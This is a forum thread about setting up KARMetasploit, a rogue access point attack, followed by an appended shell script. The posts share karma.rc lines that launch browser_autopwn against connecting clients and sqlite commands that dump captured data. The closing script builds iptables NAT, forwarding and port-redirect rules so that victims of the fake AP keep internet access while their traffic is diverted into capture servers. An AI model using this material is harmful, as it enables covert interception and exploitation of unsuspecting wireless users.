Page 1 of 2
Results 1 to 10 of 11

Thread: KARMetasploit

  1. #1
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    1

    KARMetasploit

    Hi!
    I have been trying to get KARMetasploit to work and I have one problem.
    I can get everything up and running and I can see that dhcpd is offering a Windows XP client an IP with a DHCPOFFER. The problem is that the XP client does not send any DHCPACK back to the dhcpd service.

    I have read a lot on Google and found that this is a Windows "bug" that could be corrected on the Windows client. I do not want that solution because then KARMetasploit would be quite useless.

    So I found another solution on Google:
    route add -host 255.255.255.255 dev at0

    I tried it and I still don't get any IP. Do you have any other ideas?

  2. #2
    thorin (My life is this forum)
    Join Date
    Jan 2010
    Posts
    2,629


    You can get support for KARMetasploit via http://metasploit.com/dev/trac/wiki/Karmetasploit
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  3. #3
    imported_wyze (Jenkem Addict)
    Join Date
    Jul 2007
    Posts
    1,543


    You can also send the developer an email or catch him on the (freenode) IRC channel - #remote-exploit. His handle is 'hdm', and he is a pretty nice guy when it comes to helping with matters similar to this.
    dd if=/dev/swc666 of=/dev/wyze

  4. #4
    operat0r (Good friend of the forums)
    Join Date
    Feb 2010
    Posts
    328

    You may want to check out some interesting notes here:

    http://pauldotcom.com/wiki/index.php/Episode114

  5. #5
    leaferz (Just burned his ISO)
    Join Date
    Aug 2008
    Posts
    9

    Quote Originally Posted by operat0r:
    You may want to check out some interesting notes here
    Thx for that link operat0r.

    This part (which I needed):

    cd /root
    sqlite3 karma.db
    sqlite>.mode html
    sqlite>.output karma.html
    sqlite>select * from notes;

    Isn't on the website.

  6. #6
    operat0r (Good friend of the forums)
    Join Date
    Feb 2010
    Posts
    328

    Quote Originally Posted by leaferz:
    Thx for that link operat0r.

    This part (which I needed):

    cd /root
    sqlite3 karma.db
    sqlite>.mode html
    sqlite>.output karma.html
    sqlite>select * from notes;

    Isn't on the website.
    Cool, so should I be able to get it working with just the link I gave you? I have not messed with it yet.

  7. #7
    leaferz (Just burned his ISO)
    Join Date
    Aug 2008
    Posts
    9

    Quote Originally Posted by operat0r:
    Cool, so should I be able to get it working with just the link I gave you? I have not messed with it yet.
    Yep, without a hitch.

    The only difference from the main page is the karma.rc being used. Specifically this set of lines:

    use auxiliary/server/browser_autopwn

    setg AUTOPWN_HOST 10.0.0.1
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads

    set LHOST 10.0.0.1
    set LPORT 45000
    set SRVPORT 55550
    set URIPATH /ads

    run
    Gets the info it needs and crashes the browser. I had the same result with Firefox 3.0.1 and IE 7.

    Taking those lines away keeps the user on. The only thing I left is configuring the proxy and/or dns. I'm trying to figure out the part I missed to route the user to my WAN to keep the illusion going.

  8. #8
    acebrazer (Just burned his ISO)
    Join Date
    Mar 2008
    Posts
    10

    How to route fake-AP clients to my WAN

    Quote Originally Posted by leaferz:

    The only thing I left is configuring the proxy and/or dns. I'm trying to figure out the part I missed to route the user to my WAN to keep the illusion going.
    *Ahem*... maybe I didn't get it, but IS there a way of leading some clients of MY evil AP to my WAN, so the illusion would be perfect?

    And btw: the link @ pauldotcom is only working in the old manner - for Atheros cards, isn't it?

    greets, brazer ace

  9. #9
    Revelati (Member)
    Join Date
    Sep 2008
    Posts
    146


    Yes, it is possible to have fully transparent Karmetasploit keeping the illusion perfect. You need to setup a bridge between your fake AP and another internet connection. I have gotten this to work on my old hardware but I just got my brand new laptop yesterday and have been trying to get it up and running again.

    You need to be careful though because it takes some decent hardware to do this properly as your computer has to pretend it is a router and if you have multiple clients trying to connect to it trying to get large amounts of internet data it can crash an older system in seconds.

    I have written a small tutorial for my own personal use to get everything up and running on my specific hardware, and I am toying around with the idea of releasing it and perhaps a video showing how to get a transparent Evil AP up and running. I think I will wait until I integrate Evilgrade with Karmetasploit, dubbed "BadKarma" (which is this week's project), and then do a nice polished release by the end of the week if anyone is interested.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  10. #10
    acebrazer (Just burned his ISO)
    Join Date
    Mar 2008
    Posts
    10

    Quote Originally Posted by Revelati:
    1.) You need to setup a bridge between your fake AP and another internet connection. ....
    ...You need to be careful though because it takes some decent hardware to do this properly as your computer has to pretend it is a router and if you have multiple clients trying to connect to it trying to get large amounts of internet data it can crash an older system in seconds. ....

    2.) I think I will wait until I integrate Evilgrade with Karmetasploit, dubbed "BadKarma" (which is this week's project), and then do a nice polished release by the end of the week if anyone is interested.
    >> 1.) This can't be too complicated, if one compares the capacity of a Linksys WRT54GL (with its maximum of 4096 connections) with a 433 MHz Linux box on which IPCop is routing the LAN, wireless & WAN traffic in divided networks.

    >> 2.) I AM interested!! In both - the routing AND the BadKarma.

    greets, bracer ace
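The "route the fake-AP clients out to my WAN" question raised in posts #7 through #10 never gets a concrete answer in the thread. The script below is an added example written for this page; it is not code from the thread, from Karmetasploit or from the Metasploit project. It assumes the defaults the stock Karmetasploit setup uses (airbase-ng's at0 interface, the 10.0.0.0/24 subnet dhcpd hands out, 10.0.0.1 as the gateway) and an assumed uplink interface eth0; all three can be overridden through the environment. It prints the iptables rule set for review by default and only applies it when APPLY=1 is set, since a mistake in the FORWARD chain on a laptop that is also your uplink is easy to make.

```sh
#!/bin/sh
# Added example (not from the thread or from Metasploit): turn the
# Karmetasploit box into a NAT router so fake-AP clients reach the real
# internet and the illusion of a working hotspot holds.
# Assumptions: fake AP is at0 with the 10.0.0.0/24 subnet from the stock
# dhcpd.conf; uplink is eth0. Override with AP_IF, WAN_IF, AP_NET.
AP_IF="${AP_IF:-at0}"
WAN_IF="${WAN_IF:-eth0}"
AP_NET="${AP_NET:-10.0.0.0/24}"

# Emit the forwarding/NAT rule set instead of running it, so it can be
# reviewed first. Policy is DROP: only AP -> WAN and the replies are passed.
karma_wan_rules() {
    cat <<EOF
sysctl -w net.ipv4.ip_forward=1
iptables -P FORWARD DROP
iptables -A FORWARD -i $AP_IF -o $WAN_IF -s $AP_NET -j ACCEPT
iptables -A FORWARD -i $WAN_IF -o $AP_IF -d $AP_NET -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -s $AP_NET -o $WAN_IF -j MASQUERADE
EOF
}

# Transparently divert one client-side TCP port (e.g. 80) into a local
# Metasploit capture server listening on local_port, while everything else
# is forwarded untouched. The stock karma.rc instead resolves every name to
# 10.0.0.1 through fakedns; for transparent routing that module stays out
# of the rc file and interception is done selectively here.
karma_redirect_rule() {
    port="$1"
    local_port="${2:-$1}"
    printf 'iptables -t nat -A PREROUTING -i %s -p tcp --dport %s -j REDIRECT --to-ports %s\n' \
        "$AP_IF" "$port" "$local_port"
}

# Execute the generated rules (root required). Extra arguments are ports
# to divert into local capture servers.
karma_wan_apply() {
    { karma_wan_rules; for p in "$@"; do karma_redirect_rule "$p"; done; } | sh -e
}

# Usage: `sh karma-nat.sh 80` prints the rules; `APPLY=1 sh karma-nat.sh 80`
# applies them as root.
if [ "${APPLY:-0}" = "1" ]; then
    karma_wan_apply "$@"
else
    karma_wan_rules
    for p in "$@"; do karma_redirect_rule "$p"; done
fi
```

Two things have to change on the Karmetasploit side for this to be transparent: dhcpd.conf must hand the clients a real resolver in `option domain-name-servers` instead of 10.0.0.1, and `use auxiliary/server/fakedns` has to come out of karma.rc, otherwise every hostname still resolves to the attacker box and nothing ever leaves at0. Revelati's warning about hardware applies to conntrack state as much as CPU: each forwarded flow costs a conntrack entry, so keep an eye on `/proc/sys/net/netfilter/nf_conntrack_max` on an old machine.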
